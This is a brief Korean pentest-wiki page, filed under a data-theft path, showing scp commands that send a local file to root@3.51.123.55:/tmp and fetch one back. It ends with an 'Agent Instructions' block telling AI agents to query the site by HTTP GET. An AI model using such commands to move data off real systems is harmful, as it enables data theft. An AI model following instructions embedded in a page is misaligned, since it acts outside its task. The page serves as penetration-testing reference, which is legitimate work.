# SCP

{% tabs %}
{% tab title="파일 보내기" %}

<pre class="language-bash"><code class="lang-bash"><strong># 3.51.123.55의 root 자격 증명을 통해 파일 전송
</strong>scp ./data root@3.51.123.55:/tmp
</code></pre>

{% endtab %}

{% tab title="파일 가져오기" %}

<pre class="language-bash"><code class="lang-bash"><strong># 3.51.123.55의 root 자격 증명을 통해 파일 전송
</strong>scp root@3.51.123.55:/tmp/data ./
</code></pre>

{% endtab %}
{% endtabs %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentestwiki.com/data-theft/file-transper/scp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
